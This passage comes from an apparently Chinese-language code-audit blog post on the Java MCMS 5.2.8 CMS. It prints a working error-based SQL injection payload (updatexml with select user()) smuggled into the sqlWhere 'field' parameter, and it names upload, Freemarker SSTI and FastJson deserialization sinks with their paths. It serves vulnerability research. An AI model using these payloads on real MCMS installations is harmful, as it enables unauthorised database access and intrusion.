<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">categoryType=1&amp;sqlWhere=%5B%7B%22action%22%3A%22and%22%2C%22field%22%3A%22content_title%22%2C%22el%22%3A%22eq%22%2C%22model%22%3A%22contentTitle%22%2C%22name%22%3A%22%E6%96%87%E7%AB%A0%E6%A0%87%E9%A2%98%22%2C%22type%22%3A%22input%22%2C%22value%22%3A%2212312313%22%7D%5D&amp;pageNo=1&amp;pageSize=10</span><br><span class="line">url解码之后:</span><br><span class="line">categoryType=1&amp;sqlWhere=[&#123;&quot;action&quot;:&quot;and&quot;,&quot;field&quot;:&quot;content_title&quot;,&quot;el&quot;:&quot;eq&quot;,&quot;model&quot;:&quot;contentTitle&quot;,&quot;name&quot;:&quot;文章标题&quot;,&quot;type&quot;:&quot;input&quot;,&quot;value&quot;:&quot;12312313&quot;&#125;]&amp;pageNo=1&amp;pageSize=10</span><br></pre></td></tr></table></figure>
<p><img src="/2024/11/08/WebSecurity/codeaudit/javacodemcms/image-7.png" alt="IDEA里面也有输出"><br>接下来尝试使用报错语句查询:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">categoryType=1&amp;sqlWhere=[&#123;&quot;action&quot;:&quot;and&quot;,&quot;field&quot;:&quot;updatexml(1,concat(0x7e,(select user()),0x7e),1)&quot;,&quot;el&quot;:&quot;eq&quot;,&quot;model&quot;:&quot;contentTitle&quot;,&quot;name&quot;:&quot;文章标题&quot;,&quot;type&quot;:&quot;input&quot;,&quot;value&quot;:&quot;12312313&quot;&#125;]&amp;pageNo=1&amp;pageSize=10</span><br><span class="line"></span><br><span class="line">categoryType=1&amp;sqlWhere=%5B%7B%22action%22:%22and%22,%22field%22:%22updatexml(1,concat(0x7e,(select%20user()),0x7e),1)%22,%22el%22:%22eq%22,%22model%22:%22contentTitle%22,%22name%22:%22%E6%96%87%E7%AB%A0%E6%A0%87%E9%A2%98%22,%22type%22:%22input%22,%22value%22:%2212312313%22%7D%5D&amp;pageNo=1&amp;pageSize=10</span><br></pre></td></tr></table></figure>
<p><img src="/2024/11/08/WebSecurity/codeaudit/javacodemcms/image-8.png" alt="注入结果"></p>
<h2 id="文件上传"><a href="#文件上传" class="headerlink" title="文件上传"></a>文件上传</h2><p>模板位置上传<br>&#x2F;ms&#x2F;file&#x2F;uploadTemplate.do</p>
<h2 id="SSTI：Freemarker模板注入"><a href="#SSTI：Freemarker模板注入" class="headerlink" title="SSTI：Freemarker模板注入"></a>SSTI：Freemarker模板注入</h2><p>源码位置net\mingsoft\base\util\FtlUtil.java</p>
<h2 id="FastJson"><a href="#FastJson" class="headerlink" title="FastJson &lt;&#x3D;1.2.80 反序列化"></a>FastJson &lt;&#x3D;1.2.80 反序列化</h2><p>net&#x2F;mingsoft&#x2F;basic&#x2F;action&#x2F;web&#x2F;EditorAction.javaMap&lt;String, Object&gt; map &#x3D; (Map&lt;String, Object&gt;) JSONObject.parse(jsonConfig); &#x2F;&#x2F;直接解析了jsonConfig</p>
<p>URL：@RequestMapping(“&#x2F;static&#x2F;plugins&#x2F;ueditor&#x2F;{version}&#x2F;jsp”)，需要version</p>

  </div>
</article>


    <div class="blog-post-comments">
        <div id="utterances_thread">
            <noscript>Please enable JavaScript to view the comments.</noscript>
        </div>
    </div>


        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a href="/search/">Search</a></li>
        
          <li><a href="/categories/">Categories</a></li>
        
          <li><a href="/idea/">Idea</a></li>
        
          <li><a target="_blank" rel="noopener" href="https://github.com/g0dam">Projects</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%A1%B9%E7%9B%AE%E8%AF%B4%E6%98%8E"><span class="toc-number">1.</span> <span class="toc-text">项目说明</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E5%8F%B0XSS"><span class="toc-number">2.</span> <span class="toc-text">前台XSS</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SQL%E6%B3%A8%E5%85%A5"><span class="toc-number">3.</span> <span class="toc-text">SQL注入</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9F%A5%E8%AF%A2%E5%88%86%E6%9E%90"><span class="toc-number">3.1.</span> <span class="toc-text">$ 查询分析</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%86%E6%9E%90"><span class="toc-number">3.2.</span> <span class="toc-text">&lt;include&gt;&lt;&#x2F;include&gt;分析</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0"><span class="toc-number">4.</span> <span class="toc-text">文件上传</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SSTI%EF%BC%9AFreemarker%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5"><span class="toc-number">5.</span> <span class="toc-text">SSTI：Freemarker模板注入</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#FastJson"><span class="toc-number">6.</span> <span class="toc-text">FastJson &lt;&#x3D;1.2.80 反序列化</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://godreams.cn/2024/11/08/WebSecurity/codeaudit/javacodemcms/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://godreams.cn/2024/11/08/WebSecurity/codeaudit/javacodemcms/&text=【代码审计】Java MCMS 框架 5.2.8"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://godreams.cn/2024/11/08/WebSecurity/codeaudit/javacodemcms/&title=【代码审计】Java MCMS 框架 5.2.8"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://godreams.cn/2024/11/08/WebSecurity/codeaudit/javacodemcms/&is_video=false&description=【代码审计】Java MCMS 框架 5.2.8"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=【代码审计】Java MCMS 框架 5.2.8&body=Check out this article: https://godreams.cn/2024/11/08/WebSecurity/codeaudit/javacodemcms/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://godreams.cn/2024/11/08/WebSecurity/codeaudit/javacodemcms/&title=【代码审计】Java MCMS 框架 5.2.8"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://godreams.cn/2024/11/08/WebSecurity/codeaudit/javacodemcms/&title=【代码审计】Java MCMS 框架 5.2.8"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://godreams.cn/2024/11/08/WebSecurity/codeaudit/javacodemcms/&title=【代码审计】Java MCMS 框架 5.2.8"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://godreams.cn/2024/11/08/WebSecurity/codeaudit/javacodemcms/&title=【代码审计】Java MCMS 框架 5.2.8"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://godreams.cn/2024/11/08/WebSecurity/codeaudit/javacodemcms/&name=【代码审计】Java MCMS 框架 5.2.8&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://godreams.cn/2024/11/08/WebSecurity/codeaudit/javacodemcms/&t=【代码审计】Java MCMS 框架 5.2.8"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2024
    g0dam
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a href="/categories/">Categories</a></li><!--
     --><!--
       --><li><a href="/idea/">Idea</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/g0dam">Projects</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

    <script type="text/javascript">
      var utterances_repo = 'owner/githubrepo';
      var utterances_issue_term = 'pathname';
      var utterances_label = 'Comment';
      var utterances_theme = 'github-dark';

      (function(){
          var script = document.createElement('script');

          script.src = 'https://utteranc.es/client.js';
          script.setAttribute('repo', utterances_repo);
          script.setAttribute('issue-term', 'pathname');
          script.setAttribute('label', utterances_label);
          script.setAttribute('theme', utterances_theme);
          script.setAttribute('crossorigin', 'anonymous');
          script.async = true;
          (document.getElementById('utterances_thread')).appendChild(script);
      }());
  </script>

</body>
</html>
